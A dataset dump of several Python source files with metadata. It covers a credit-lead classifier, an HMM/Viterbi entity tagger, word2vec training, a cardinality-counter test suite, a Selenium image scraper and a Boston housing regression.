inplace=True)\r\n\r\nprint(train_data.dtypes)\r\nprint(test.dtypes)\r\n\r\n#Converting Categorical Var to numeric\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle=LabelEncoder()\r\ncolname= ['Gender','Region_Code','Occupation','Channel_Code','Credit_Product','Is_Active']\r\nfor a in colname:\r\n train_data[a] = le.fit_transform(train_data[a])\r\n test[a] = le.fit_transform(test[a])\r\nprint(train_data)\r\nprint(test)\r\n\r\n# Applying Cross validation and calculating roc-auc score\r\n# Removing target var 'Is_Lead' from train_data and storing in another var\r\nX=train_data.drop('Is_Lead',axis=1)\r\ny=train_data['Is_Lead']\r\n\r\nfrom sklearn.model_selection import KFold , StratifiedKFold\r\nfrom sklearn.metrics import roc_auc_score\r\n\r\n\r\ndef cross_val(X, y, model, params, folds=9):\r\n skf = StratifiedKFold(n_splits=folds, shuffle=True, random_state=21)\r\n for fold, (train_idx, test_idx) in enumerate(skf.split(X, y)):\r\n print(f\"Fold: {fold}\")\r\n x_train, y_train = X.iloc[train_idx], y.iloc[train_idx]\r\n x_test, y_test = X.iloc[test_idx], y.iloc[test_idx]\r\n\r\n algo = model(**params)\r\n algo.fit(x_train, y_train, eval_set=[(x_test, y_test)], early_stopping_rounds=100, verbose=400)\r\n pred = algo.predict_proba(x_test)[:, 1]\r\n roc_score = roc_auc_score(y_test, pred)\r\n print(f\"roc_auc_score: {roc_score}\")\r\n print(\"-\" * 50)\r\n return algo\r\n\r\n#Light Gradient Boosting Algorithm\r\nlgbm_params = {'learning_rate': 0.1,'n_estimators': 20000, 'max_bin': 94,'num_leaves': 12,'max_depth': 30,'reg_alpha': 8.457,\r\n 'reg_lambda': 6.853,'subsample': 1.0}\r\nfrom lightgbm import LGBMClassifier\r\nlgb_model = cross_val(X, y, LGBMClassifier, lgbm_params)\r\npredict_test_lgb=lgb_model.predict_proba(test)[:, 1]\r\nsubmission = pd.DataFrame({'Is_Lead': predict_test_lgb})\r\nsubmission.to_csv('C:/Users/hp/Desktop/submission_LgbmClassifier1.csv',index=False)\r\n#roc_auc_score: 0.8525869220635909\r\n\r\n\r\n#XtraGradient Boosting Algorithm\r\nxgbm_params= {'n_estimators': 20000, 'max_depth': 5, 'learning_rate': 0.03, 'reg_lambda': 29.326, 'subsample': 0.818,\r\n 'colsample_bytree': 0.235, 'colsample_bynode': 0.81, 'colsample_bylevel': 0.453}\r\nfrom xgboost import XGBClassifier\r\nxgbm_model = cross_val(X, y, XGBClassifier, xgbm_params)\r\npredict_test_xgbm=xgbm_model.predict_proba(test)[:, 1]\r\nsubmission = pd.DataFrame({'Is_Lead': predict_test_xgbm})\r\nsubmission.to_csv('C:/Users/hp/Desktop/submission_xgbmClassifier.csv',index=False)\r\n#roc_auc_score: 0.8484759668139442\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "CCLead.py", "file_name": "CCLead.py", "file_ext": "py", "file_size_in_byte": 6723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 47, "usage_type": "attribute"}, {"api_name": "seaborn.countplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 118, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 124, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 137, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 155, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 164, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 173, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 184, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 186, "usage_type": "call"}]} +{"seq_id": "177567239", "text": "from collections import Counter\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score\n\n\n# read file and reprocessing data\ndef getDataSet(fileName):\n file = open(fileName, 'r')\n result = []\n wordsSet = []\n tagsSet = []\n word_tags = Counter()\n tag_tags = Counter()\n for line in file:\n context = (line.replace(\"\\n\", \"\")).split(\"\\t\")\n token = context[0].lower().split(\" \")\n tags = context[1].split(\" \")\n wordsSet.extend(token)\n tagsSet.extend(tags)\n for i in range(len(token)):\n word_tags[token[i] + \"_\" + tags[i]] += 1\n if i > 0:\n tag_tags[tags[i - 1] + \"_\" + tags[i]] += 1\n else:\n tag_tags[str(None) + \"_\" + tags[i]] += 1\n result.append(list(zip(token, tags)))\n return result, list(set(wordsSet)), list(set(tagsSet)), dict(word_tags), dict(tag_tags)\n\n\ndef initW(wordsSet, tagsSet):\n W = {}\n for word in wordsSet:\n for tag in tagsSet:\n W[word + \"_\" + tag] = 0\n for tag1 in tagsSet:\n W[str(None) + \"_\" + tag1] = 0\n for tag2 in tagsSet:\n W[tag1 + \"_\" + tag2] = 0\n return W\n\n\ndef viterbi(dataTokens, tagsSet, tag_tags, word_tags, W):\n \"\"\"\n :param dataTokens:观测序列\n :param tagsSet:隐状态\n :param tag_tags:转移概率(隐状态)\n :param word_tags: 发射概率 (隐状态表现为显状态的概率)\n :return:\n \"\"\"\n # 路径概率表 V[时间][隐状态] = 概率\n V = [{}]\n # 一个中间变量,代表当前状态是哪个隐状态\n path = {}\n\n # 初始化初始状态 (t == 0)\n for y in tagsSet:\n V[0][y] = W.get(str(None) + \"_\" + y, 0) * \\\n tag_tags.get(str(None) + \"_\" + y, 0) * \\\n word_tags.get(dataTokens[0] + \"_\" + y, 0)\n path[y] = [y]\n\n # 对 t > 0 跑一遍维特比算法\n for t in range(1, len(dataTokens)):\n V.append({})\n newpath = {}\n\n for y in tagsSet:\n # 概率 隐状态 = W * 前状态是y0的概率 * y0转移到y的概率 * y表现为当前状态的概率\n\n (prob, state) = max([(V[t - 1][y0] *\n W.get(y0 + \"_\" + y, 0) *\n tag_tags.get(y0 + \"_\" + y, 0) *\n word_tags.get(dataTokens[t] + \"_\" + y, 0), y0) for y0 in tagsSet])\n # 记录最大概率\n V[t][y] = prob\n # 记录路径\n newpath[y] = path[state] + [y]\n\n # 不需要保留旧路径\n path = newpath\n\n (prob, state) = max([(V[len(dataTokens) - 1][y], y) for y in tagsSet])\n return (prob, path[state])\n\n\ndef training(dataSet, wordsSet, tagsSet, word_tags, tag_tags):\n W = initW(wordsSet, tagsSet)\n random.seed(2)\n R = random.random()\n for loop in range(10):\n random.shuffle(dataSet, lambda: R)\n # random.shuffle(dataSet)\n cw = 0\n for data in dataSet:\n dataTokens, dataTags = zip(*data) # separate the data pairsd\n predictTag = viterbi(dataTokens, tagsSet, tag_tags, word_tags, W)\n if (not checkList(predictTag[1], dataTags)):\n # print(\"pre:{} # dataT:{}\".format(predictTag[1], dataTags))\n cw += 1\n W = updateW(W, dataTokens, dataTags, predictTag[1], word_tags, tag_tags)\n return W\n\n\ndef updateW(W, dataTokens, dataTags, predictTags, word_tags, tag_tags):\n for i in range(len(dataTags)):\n wordTag_Right = dataTokens[i] + \"_\" + dataTags[i]\n wordTag_Predict = dataTokens[i] + \"_\" + predictTags[i]\n if i > 0:\n tagTag_Right = dataTags[i - 1] + \"_\" + dataTags[i]\n tagTag_Predict = predictTags[i - 1] + \"_\" + predictTags[i]\n else:\n tagTag_Right = str(None) + \"_\" + dataTags[i]\n tagTag_Predict = str(None) + \"_\" + predictTags[i]\n W[wordTag_Right] += word_tags[wordTag_Right] / len(word_tags)\n W[tagTag_Right] += tag_tags[tagTag_Right] / len(tag_tags)\n W[wordTag_Predict] -= word_tags.get(wordTag_Predict, 0) / len(word_tags)\n W[tagTag_Predict] -= tag_tags.get(tagTag_Predict, 0) / len(tag_tags)\n # temp = \"W[{}]:{}, W[{}]:{}, W[{}]:{}, W[{}]:{}\".format(\n # wordTag_Right, W[wordTag_Right],\n # tagTag_Right, W[tagTag_Right],\n # wordTag_Predict, W[wordTag_Predict],\n # tagTag_Predict, W[tagTag_Predict]\n # )\n # print(temp)\n return W\n\n\ndef testing(dataSet_test, tagsSet, W):\n index = 0\n predictLable = []\n correctLable = []\n for data in dataSet_test:\n dataToken_test, dataTag_test = zip(*data)\n predict_test = viterbi(dataToken_test, tagsSet, tag_tags, word_tags, W)\n correctLable.extend(list(dataTag_test))\n predictLable.extend(predict_test[1])\n if (checkList(predict_test[1], dataTag_test)):\n index += 1\n # print(index, \" @@ \", predict_test[1], \" ## \", dataTag_test)\n print(correctLable)\n print(predictLable)\n print(\"index:{},length:{},rate:{}\".format(index, len(dataSet_test), index / len(dataSet_test)))\n f1_micro = f1_score(correctLable, predictLable, average='micro', labels=['ORG', 'MISC', 'PER', 'LOC'])\n print(\"f1_micro: \", f1_micro)\n\n\ndef checkList(list1, list2):\n if (len(list1) != len(list2)):\n return False\n for i in range(len(list1)):\n if (list1[i] != list2[i]):\n return False\n return True\n\n\nstartTime = time.time() # start time\ndataSet, wordsSet, tagsSet, word_tags, tag_tags = getDataSet(\"train.txt\")\ndataSet_test, wordsSet_test, tagsSet_test, word_tags_test, tag_tags_test = getDataSet(\"test.txt\")\n\n# print(dataSet)\n# print(wordsSet)\n# print(tagsSet)\n# print(word_tags)\n# print(tag_tags)\n\nW = training(dataSet, wordsSet, tagsSet, word_tags, tag_tags)\n# print(len(wordsSet), len(tagsSet))\n# print(len(W))\n# for k, v in W.items():\n# if (v != 0):\n# print(k, v)\ntesting(dataSet_test, tagsSet, W)\n\nendTime = time.time() # end time\nprint(endTime - startTime, \"s\") # show the time cost\n", "sub_path": "lab_7/lab7_v1.py", "file_name": "lab7_v1.py", "file_ext": "py", "file_size_in_byte": 6046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 15, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 90, "usage_type": "call"}, {"api_name": "random.random", "line_number": 91, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "609148467", "text": "import gensim, logging, os,pickle\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nclass MySentences(object):\n def __init__(self, filename):\n self.datapkl = pickle.load(open(filename,'rb'))\n \n def __iter__(self):\n \tfor line in self.datapkl:\n \t\tyield line[0]\n\nif __name__ == \"__main__\":\n\t\n\t\n\t#sentences = MySentences(filename) # a memory-friendly iterator\n\tfilename = '../dataset/pickles/train_lines.pkl' #train word2vec\n\tsentences = list()\n\tdatapkl = pickle.load(open(filename,'rb'))\n\tfor i in datapkl:\n\t\tsentences.append(i[0].split())\n\t\t#sentences.append([i[0].strip()])\n\t\t#sentences.append(i[0].decode('utf-8'))\n\n\tfilename = '../dataset/pickles/test_lines.pkl' #train word2vec\n\tdatapkl = pickle.load(open(filename,'rb'))\n\tfor i in datapkl:\n\t\tsentences.append(i[0].split())\n\t\t#sentences.append([i[0].strip()])\n\t\n\t#train word2vec on test sentences also - check performance.\n\t#print sentences\n\tmodel = gensim.models.Word2Vec(sentences,min_count=1,size=50)\n\n\tmodel.save('w2vmodel')\n", "sub_path": "final/word2vec/word2vec_train.py", "file_name": "word2vec_train.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 2, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 2, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 25, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "437730059", "text": "import torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\nclass RMSELoss(nn.Module):\n def __init__(self, eps=1e-6):\n super().__init__()\n self.mse = nn.MSELoss()\n self.eps = eps\n \n def forward(self, yhat, y):\n loss = torch.sqrt(self.mse(yhat,y) + self.eps)\n return loss\n\n\n#help(nn.MSELoss())\ndef plot(train_loss, test_loss):\n x = [*range(1, len(train_loss))]\n plt.plot(x, train_loss[1:], label = 'train_loss')\n plt.plot(x, test_loss[1:], label = 'test_loss')\n plt.legend()\n plt.grid()\n plt.savefig('train_test_loss.png')\n plt.clf()", "sub_path": "Matrix Factorization/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "254754358", "text": "import pytest\n\nfrom pdsa.cardinality.probabilistic_counter import ProbabilisticCounter\n\n\nLOREM_TEXT = {\n \"text\": (\n \"Lorem ipsum dolor sit amet consectetur adipiscing elit Donec quis \"\n \"felis at velit pharetra dictum Sed vehicula est at mi lobortis \"\n \"vitae suscipit mi aliquet Sed ut pharetra nisl Donec maximus enim \"\n \"sit amet erat ullamcorper ut mattis mauris gravida Nulla sagittis \"\n \"quam a arcu pretium iaculis Donec vestibulum tellus nec ligula \"\n \"mattis vitae aliquam augue dapibus Curabitur pulvinar elit nec \"\n \"blandit pharetra ipsum elit ultrices sem et bibendum lorem arcu \"\n \"sit amet arcu Nam pulvinar porta molestie Integer posuere ipsum \"\n \"venenatis velit euismod accumsan sed quis nibh Suspendisse libero \"\n \"odio tempor ultricies lectus non volutpat rutrum diam Nullam et \"\n \"sem eu quam sodales vulputate Nulla condimentum blandit mi ac \"\n \"varius quam vehicula id Quisque sit amet molestie lacus ac \"\n \"efficitur ante Proin orci lacus fringilla nec eleifend non \"\n \"maximus vel ipsum Sed luctus enim tortor cursus semper mauris \"\n \"ultrices vel Vivamus eros purus sodales sed lectus at accumsan \"\n \"dictum massa Integer pulvinar tortor sagittis tincidunt risus \"\n \"non ultricies augue Aenean efficitur justo orci at semper ipsum \"\n \"efficitur ut Phasellus tincidunt nibh ut eros bibendum eleifend \"\n \"Donec porta risus nec placerat viverra leo justo sollicitudin \"\n \"metus a lacinia mi justo ut augue Duis dolor lacus sodales ut \"\n \"tortor eu rutrum\"\n ),\n \"num_of_words\": 200,\n \"num_of_unique_words\": 111,\n \"num_of_unique_words_icase\": 109\n}\n\n\ndef test_init():\n pc = ProbabilisticCounter(10)\n assert pc.sizeof() == 40, \"Unexpected size in bytes\"\n\n with pytest.raises(ValueError) as excinfo:\n pc = ProbabilisticCounter(0)\n assert str(excinfo.value) == 'At least one simple counter is required'\n\n\ndef test_repr():\n pc = ProbabilisticCounter(10)\n\n assert repr(pc) == (\n \"\")\n\n\ndef test_add():\n pc = ProbabilisticCounter(10)\n\n for word in [\"test\", 1, {\"hello\": \"world\"}]:\n pc.add(word)\n\n\ndef test_count_big():\n pc = ProbabilisticCounter(256)\n\n # NOTE: make n/m > 50 to avoid correction for small cardinalities usage\n boost = 50 * LOREM_TEXT[\"num_of_unique_words\"] // 64 + 1\n num_of_unique_words = boost * LOREM_TEXT[\"num_of_unique_words\"]\n\n for i in range(boost):\n for word in LOREM_TEXT[\"text\"].split():\n pc.add(\"{}_{}\".format(word, i))\n\n cardinality = pc.count()\n assert cardinality >= 0.8 * num_of_unique_words\n assert cardinality <= 1.2 * num_of_unique_words\n\n\ndef test_count_small():\n pc = ProbabilisticCounter(64, True)\n assert pc.count() == 0\n\n for word in LOREM_TEXT[\"text\"].split():\n pc.add(word)\n\n num_of_unique_words = LOREM_TEXT[\"num_of_unique_words\"]\n\n cardinality = pc.count()\n assert cardinality >= 0.5 * num_of_unique_words\n assert cardinality <= 1.5 * num_of_unique_words\n\n\ndef test_len():\n pc = ProbabilisticCounter(10)\n assert len(pc) == 320\n", "sub_path": "tests/cardinality/test_probabilistic_counter.py", "file_name": "test_probabilistic_counter.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 40, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 41, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 46, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 53, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 60, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 76, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "618333091", "text": "#초기 변수 설정 \nimport sys, os\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib, urllib.request\nimport requests\nimport random\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n###initial set\n\nfolder = \"./image/\"\nwebDriver = \"./chromedriver.exe\"\nsearchItems = [\"아이디어 유모차\",\"자전거 유모차\",\"페도라 유모차\",\"컨셉 유모차\",\"클래식 유모차\",\"전동 유모차\"]\nsize = 300\n\nfor item in searchItems:\n params ={\n \"q\":item\n ,\"tbm\":\"isch\"\n ,\"sa\":\"1\"\n ,\"source\":\"lnms&tbm=isch\"\n }\n\n print(params)\n\n url = \"https://www.google.com/search\"\n #브라우저 구동\n url = url+\"?\"+urllib.parse.urlencode(params)\n\n print(url)\n\n browser = webdriver.Chrome(webDriver)\n time.sleep(0.5)\n browser.get(url)\n html = browser.page_source\n time.sleep(0.5)\n\n\n #Page Down\n ### get number of image for a page\n soup_temp = BeautifulSoup(html,'html.parser')\n img4page = len(soup_temp.findAll(\"img\"))\n\n ### page down \n elem = browser.find_element_by_tag_name(\"body\")\n imgCnt =0\n\n\n while imgCnt < size*10:\n # elem.send_keys(Keys.PAGE_DOWN)\n\n More_Results = browser.find_element_by_xpath('//*[@id=\"islmp\"]/div/div/div/div/div[5]/input')\n try:\n elem.send_keys(Keys.PAGE_DOWN)\n More_Results.click()\n except :\n elem.send_keys(Keys.PAGE_DOWN)\n\n rnd = random.random()\n # print(imgCnt)\n time.sleep(rnd)\n imgCnt+=img4page\n\n\n\n # html 가공, src 추출\n html = browser.page_source\n soup = BeautifulSoup(html,'html.parser')\n img = soup.findAll(\"img\")\n\n browser.find_elements_by_tag_name('img')\n\n fileNum=0\n srcURL=[]\n\n for line in img:\n if str(line).find('data-src') != -1 and str(line).find('http')<100: \n # print(fileNum, \" : \", line['data-src']) \n srcURL.append(line['data-src'])\n fileNum+=1\n\n\n\n #폴더 생성, 파일 저장\n ### make folder and save picture in that directory\n saveDir = folder+item\n\n try:\n if not(os.path.isdir(saveDir)):\n os.makedirs(os.path.join(saveDir))\n except OSError as e:\n if e.errno != errno.EEXIST:\n print(\"Failed to create directory!!!!!\")\n raise\n\n for i,src in zip(range(fileNum),srcURL):\n try:\n urllib.request.urlretrieve(src, saveDir+\"/\"+str(i)+\".png\")\n # print(i,\"saved\")\n except :\n print(\"이미지를 찾을수 없습니다.\")\n \n browser.quit()\n", "sub_path": "원본.py", "file_name": "원본.py", "file_ext": "py", "file_size_in_byte": 2626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib.parse.urlencode", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.PAGE_DOWN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.PAGE_DOWN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 60, "usage_type": "name"}, {"api_name": "random.random", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 101, "usage_type": "attribute"}]} +{"seq_id": "184406995", "text": "from sklearn.datasets import load_boston\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nboston_data = load_boston()\r\n\r\nboston = pd.DataFrame(data=boston_data.data, columns=boston_data.feature_names)\r\nboston['target'] = boston_data.target\r\n\r\ntrain = boston.sample(frac=0.8, random_state=200)\r\ntest = boston.drop(train.index)\r\n\r\nmlr = LinearRegression()\r\nmlr.fit(train[['PTRATIO', 'INDUS', 'NOX', 'B', 'CHAS', 'RAD', 'TAX', 'ZN', 'DIS', 'CRIM', 'RM', 'LSTAT', 'AGE']], train['target'])\r\nprint(mlr.intercept_)\r\nprint(mlr.coef_)\r\n\r\nsum_difference = 0\r\nfor i, row in test.iterrows():\r\n estimate = row['PTRATIO'] * mlr.coef_[0] + row['INDUS'] * mlr.coef_[1] + row['NOX'] * mlr.coef_[2] + \\\r\n row['B'] * mlr.coef_[3] + row['CHAS'] * mlr.coef_[4] + row['RAD'] * mlr.coef_[5] + \\\r\n row['TAX'] * mlr.coef_[6] + row['ZN'] * mlr.coef_[7] + row['DIS'] * mlr.coef_[8] + \\\r\n row['CRIM'] * mlr.coef_[9] + row['RM'] * mlr.coef_[10] + row['LSTAT'] * mlr.coef_[11] + \\\r\n row['AGE'] * mlr.coef_[12] + mlr.intercept_\r\n sum_difference += abs(estimate - row['target'])\r\nprint(sum_difference)", "sub_path": "test6.py", "file_name": "test6.py", "file_ext": "py", "file_size_in_byte": 1130, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 